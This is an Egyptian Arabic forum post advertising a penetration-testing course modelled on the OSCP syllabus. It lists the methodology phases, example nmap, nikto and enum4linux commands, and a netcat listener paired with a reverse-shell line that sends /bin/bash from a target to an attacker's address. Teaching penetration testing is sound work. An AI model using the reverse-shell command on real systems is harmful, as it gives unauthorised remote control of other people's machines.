- بواسطة x32x01 ||
دورة احترافية في Penetration Testing معمولة علشان أي حد عايز يدخل ميدان اختبار الاختراق بجد - مش بس يشغّل أدوات وخلاص. هنا هندّيك منهج واضح: من الأساسيات للمهارات المتقدمة، مع أمثلة عملية وتمارين تطبيقية. الدورة بتشرح الفكرة ورا كل خطوة مش بس طريقة استخدام الـtools، وده اللي بيفرق المُحترف عن اللي بس بيتبع خطوات جاهزة.
هو اختبار الاختراق ده يعني إيه؟
ببساطة، اختبار الاختراق أو Penetration Testing هو إنك تحاول تلاقي ثغرات في نظام/شبكة/تطبيق زي ما الهاكرز بيعملوا، لكن بهدف تحسين الأمان. دوره مين؟ هدفه يكتشف المشاكل قبل ما حد يستغلها، ويقدّم حلول واضحة.
محتوى الدورة - إيه اللي هتتعلمه بالظبط
الدورة معمولة بطريقة منهجية (Methodology) مش عشوائية. هتتدرّب على كل مرحلة خطوة بخطوة:
ليه مش نستخدم الـtools blind؟
المشكلة إن كتير من الناس بتشغّل أدوات من غير ما تفهم النتيجة أو معنى الـoutput. هنا هتتعلم:
متطلبات بسيطة قبل ما تبدأ
مش محتاج تبقى عبقري، لكن شوية أساسيات هتسهّل عليك:
أمثلة كود وأوامر توضيحية
هقولك شوية أوامر بسيطة هتشوفها في الكورس، ومعاهم شرح سريع:
فحص الشبكة بـ nmap:
بحث سريع عن بوابات HTTP مع nikto:
فتح اتصال بسيط بـ netcat (listener):
قائمة ملفات مشاركة SMB:
مثال Python بسيط يورِّي طريقة طلب HTTP:
ملاحظات: دي أمثلة توضيحية لتبسيط الفكرة. في الكورس هتتعلم الفروق، المخاطر، وإمتى تستخدم كل أداة بأمان.
من الRecon للPivoting: ازاي تمشي خطوة بخطوة
منهج الدورة قريب جداً من OSCP
الدورة بتغطي مواد ومهارات كتير من منهج OSCP - لكن بشكل عملي وتركيز على إنك تتعلم تدور وتحل مشكلات بنفسك. الهدف إنك بعد ما تخلص تكون تقدر تدور على المعلومة وتحل الاختبارات مش مجرد تقليد.
نصائح علشان تستفيد لأقصى درجة
فين أتابع الدورة؟
تابع الفيديوهات والكورسات العملية على اليوتيوب من خلال البلاي ليست دي:
https://www.youtube.com/playlist?list=PL7QLnOrqAmwaZKK7fi4QgfLjOoQAVvH2X
خاتمة محفزة
لو انت جدّ وعايز تبقى PenTester حقيقي - الدورة دي هتمهّدلك الطريق. هتتعلم مش بس الأدوات، لكن المنهجية والفكر وازاي تحل مشاكل حقيقية. ابدأ واتدرّب واحنا معاكي خطوة بخطوة.
هو اختبار الاختراق ده يعني إيه؟
ببساطة، اختبار الاختراق أو Penetration Testing هو إنك تحاول تلاقي ثغرات في نظام/شبكة/تطبيق زي ما الهاكرز بيعملوا، لكن بهدف تحسين الأمان. دوره مين؟ هدفه يكتشف المشاكل قبل ما حد يستغلها، ويقدّم حلول واضحة.محتوى الدورة - إيه اللي هتتعلمه بالظبط
الدورة معمولة بطريقة منهجية (Methodology) مش عشوائية. هتتدرّب على كل مرحلة خطوة بخطوة:- Reconnaissance (جمع المعلومات): إزاي تجمع معلومات عن الهدف صح، من مصادر مفتوحة (OSINT) ومن مسح شبكات.
- Scanning & Enumeration: استخدام أدوات زي nmap وnikto وenum4linux علشان تلاقي خدمات ونقاط دخول.
- Exploitation: فهم الضعف واستغلاله بشكل متحكم علشان تقدر تدخل النظام.
- Post-Exploitation: بعد ما تدخل، هنعمل pivoting وlateral movement للوصول لأهداف أعمق.
- Privilege Escalation: ازاي تزوّد صلاحياتك داخل النظام.
- Reporting: إزاي تكتب تقرير احترافي يوضح الثغرات وحلولها - وده مهم جداً.
ليه مش نستخدم الـtools blind؟
المشكلة إن كتير من الناس بتشغّل أدوات من غير ما تفهم النتيجة أو معنى الـoutput. هنا هتتعلم:- تفسير نتايج الأدوات.
- إمتى تستخدم أداة وإمتى ماتستخدمهاش.
- إزاي ترفض "فزّاعة" النتائج الكتير وتحط استراتيجية ذكية.
متطلبات بسيطة قبل ما تبدأ
مش محتاج تبقى عبقري، لكن شوية أساسيات هتسهّل عليك:- فهم بسيط للشبكات (IP, TCP/UDP, ports).
- شوية Linux basics (ترمينال، أوامر بسيطة).
- الاستعداد للتعلم العملي والتجربة.
أمثلة كود وأوامر توضيحية
هقولك شوية أوامر بسيطة هتشوفها في الكورس، ومعاهم شرح سريع:فحص الشبكة بـ nmap:
Bash:
# فحص كامل مع كشف نسخ الخدمات
nmap -sC -sV -p- 192.168.1.100 بحث سريع عن بوابات HTTP مع nikto:
Bash:
nikto -h http://192.168.1.100 فتح اتصال بسيط بـ netcat (listener):
Bash:
# على الماكينة الهجومية
nc -lvnp 4444
# على الهدف (مثال بسيط لرفع شِل - افتراضي)
nc 192.168.1.50 4444 -e /bin/bash قائمة ملفات مشاركة SMB:
Bash:
enum4linux -a 192.168.1.100 مثال Python بسيط يورِّي طريقة طلب HTTP:
Python:
import requests
url = "http://192.168.1.100/login"
resp = requests.get(url)
print(resp.status_code)
print(resp.headers) من الRecon للPivoting: ازاي تمشي خطوة بخطوة
- Recon: اجمع أكبر قدر من المعلومات عن الهدف (subdomains, IPs, emails).
- Scanning: حدّد الخدمات المفتوحة ونوعها.
- Enumeration: دور على قواعد بيانات، ملفات config، أو خدمات ضعيفة.
- Exploit: لو لقيت ثغرة معروفة، فهمها كويس قبل الاستغلال.
- Post-Exploit: بعد الدخول، تقدر تعمل pivoting للوصول لشبكات تانية—وده بيتطلب فهم الشبكة كويس.
منهج الدورة قريب جداً من OSCP
الدورة بتغطي مواد ومهارات كتير من منهج OSCP - لكن بشكل عملي وتركيز على إنك تتعلم تدور وتحل مشكلات بنفسك. الهدف إنك بعد ما تخلص تكون تقدر تدور على المعلومة وتحل الاختبارات مش مجرد تقليد.نصائح علشان تستفيد لأقصى درجة
- طبق كل فيديو/درس فور ما تخلصه.
- ماتخافش تجرب في مختبر (lab) مش في أنظمة حقيقية من غير تصريح.
- اقرأ الـlogs وافهم الأخطاء مش بس تتجاهلها.
- اتعلم تكتب تقارير واضحة - المهارات دي تفرّق في الشغل.
فين أتابع الدورة؟
تابع الفيديوهات والكورسات العملية على اليوتيوب من خلال البلاي ليست دي:https://www.youtube.com/playlist?list=PL7QLnOrqAmwaZKK7fi4QgfLjOoQAVvH2X
خاتمة محفزة
لو انت جدّ وعايز تبقى PenTester حقيقي - الدورة دي هتمهّدلك الطريق. هتتعلم مش بس الأدوات، لكن المنهجية والفكر وازاي تحل مشاكل حقيقية. ابدأ واتدرّب واحنا معاكي خطوة بخطوة. التعديل الأخير: